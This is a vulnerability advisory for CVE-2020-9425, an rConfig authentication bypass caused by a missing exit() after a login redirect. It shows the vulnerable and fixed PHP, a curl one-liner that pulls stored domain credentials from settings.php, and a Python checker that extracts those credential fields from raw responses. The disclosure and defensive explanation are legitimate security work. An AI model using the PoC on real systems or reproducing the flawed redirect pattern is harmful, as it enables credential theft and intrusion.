[CVE-2020-9425] rConfig < 3.9.4 Authentication Bypass

What is rConfig?

rConfig is an open source PHP web application for network device configuration management. It is commonly deployed on corporate internal networks by teams looking for an easy way to manage and back up the configurations of network-connected devices.

Discovery

The discovery of this bug was straightforward, and it should be obvious in both white-box and black-box scenarios. I came across it while on an internal penetration test at work: while directory bruteforcing one host I found an /rconfig/ folder. At first it appeared to be locked behind a set of admin credentials that I did not have, so I continued with content discovery, attempting to find any pages that might be accessible. After it had run for some time I noticed that many PHP pages were returning 302 redirects with large response bodies. A redirect that still carries a full page is usually a sign of a broken authentication check, because the server has issued the redirect but gone on to render the protected content anyway. At this point I sent a request to rconfig/settings.php through Burp Suite, intercepting the response and stripping the Location header. The page loaded, and I realised I had at least read access to the web application and could view its configuration settings. This was extremely useful to me, as I was in need of a set of privileged domain credentials, and a set belonging to a service account was conveniently sitting in plaintext in an input field on the settings page.

What was the root cause of this bug?

The core issue is in the application’s “is this user logged in” check, which lives in includes/head.inc.php. Reviewing that file reveals the following code.

/**
 * User has NOT logged in, so redirect to main login page
 */
if (!$session->logged_in) {
    header("Location: " . $config_basedir . "login.php");
    // No exit() here: the Location header is queued for the response,
    // but the script keeps running and renders the protected page below.
}

This is a standard login check present in many PHP applications: if the user is not logged in, redirect them to the login page. The important detail is that header() only sets the Location header on the outgoing response; it does not stop the script. The issue is the missing exit (or die) after the header call. Without it, PHP continues processing the rest of the file and returns the page contents in the body of the 302 response, exactly as if the user were authenticated. Any client that does not follow the redirect (curl without -L, or Burp with the Location header stripped) simply reads the protected page.

As expected, the fix was equally simple: add the missing exit call after the redirect, as shown below.

/**
 * User has NOT logged in, so redirect to main login page
 */
if (!$session->logged_in) {
    header("Location: " . $config_basedir . "login.php");
    exit();
}

Proof of Concept

Below is a simple one-liner PoC to retrieve the stored domain credentials (if present). The full impact of this bug is likely to be much higher, since every page that relies on this check is readable without authentication, and the application exists to hold network device configurations and the credentials used to collect them.

  1. Run the following command (curl does not follow redirects unless -L is given, so the body of the 302 response is printed rather than the login page): curl -s https://target/rconfig/settings.php | grep "defaultNode"
  2. Observe the values returned for the defaultNodeUsername and defaultNodePassword fields, revealing the stored credentials.
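The following script is an added example (it is not part of the original advisory and is not rConfig code) that turns the observation from the Discovery section into an offline check: given a raw HTTP response, it flags a 3xx to a login page whose body is too large to be a plain redirect stub, and pulls the defaultNode* input values out of that body so the finding is actionable. The two sample responses, the credential values in them, the BODY_THRESHOLD tuning value and all function names are constructed for this example; only the field names defaultNodeUsername and defaultNodePassword come from the advisory.

```python
"""Offline check for the CVE-2020-9425 pattern: a redirect to login.php
whose body still contains the protected page.

Added example, not from the advisory or from rConfig. The responses below
are constructed; a real test would feed in the bytes returned by the
target without following redirects.
"""
from html.parser import HTMLParser

# Constructed sample: vulnerable server. header("Location: ...") was sent,
# but PHP kept executing and emitted the settings page after the headers.
VULNERABLE_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: Apache\r\n"
    b"Location: /rconfig/login.php\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
    b"<html><body><form method='post' action='settings.php'>\n"
    b"<input type='text' name='defaultNodeUsername' value='svc_rconfig'>\n"
    b"<input type='text' name='defaultNodePassword' value='Winter2020!'>\n"
    b"<input type='submit' value='Save'>\n"
    b"</form></body></html>\n"
)

# Constructed sample: patched server. exit() after header() means nothing
# is rendered after the redirect, so the body is empty.
PATCHED_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: Apache\r\n"
    b"Location: /rconfig/login.php\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
)

# Body size above which a redirect is worth a closer look. A clean PHP
# redirect has an empty body; a full page is far larger. Hypothetical
# tuning value chosen for this example.
BODY_THRESHOLD = 128


class _InputValues(HTMLParser):
    """Collect name -> value for every <input> element in a page."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        attr = dict(attrs)
        if attr.get("name"):
            self.fields[attr["name"]] = attr.get("value", "")


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return status, headers, body


def check_redirect_bypass(raw, threshold=BODY_THRESHOLD):
    """Describe whether a raw response matches the redirect-without-exit bug.

    The tell is a 3xx pointing at a login page whose body is not the
    empty/stub body a real redirect carries. When it matches, any
    defaultNode* input values found in the body are returned as well.
    """
    status, headers, body = parse_response(raw)
    location = headers.get("location", "")
    is_login_redirect = 300 <= status < 400 and "login" in location.lower()
    oversized = len(body) > threshold
    result = {
        "status": status,
        "location": location,
        "body_length": len(body),
        "bypass": is_login_redirect and oversized,
        "leaked": {},
    }
    if result["bypass"]:
        parser = _InputValues()
        parser.feed(body.decode("utf-8", errors="replace"))
        result["leaked"] = {k: v for k, v in parser.fields.items()
                            if k.startswith("defaultNode")}
    return result


if __name__ == "__main__":
    for label, raw in (("vulnerable", VULNERABLE_RESPONSE),
                       ("patched", PATCHED_RESPONSE)):
        print(label, check_redirect_bypass(raw))
```

The same logic generalises to any PHP application: run it over every 3xx response captured during content discovery, and any redirect to a login page with a non-trivial body is a candidate for a missing exit after header(). The body-size heuristic is deliberately loose; the extracted input values are what confirm the finding.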

Disclosure Timeline

The maintainer was very quick to respond and release a fix which was greatly appreciated.

  • 12 February 2020 — Vendor notified
  • 14 February 2020 — Vendor acknowledged
  • 25 February 2020 — Vendor fix pushed to Github
  • 17 March 2020 — Original advisory posted
  • 22 January 2022 — New advisory posted as the original is no longer accessible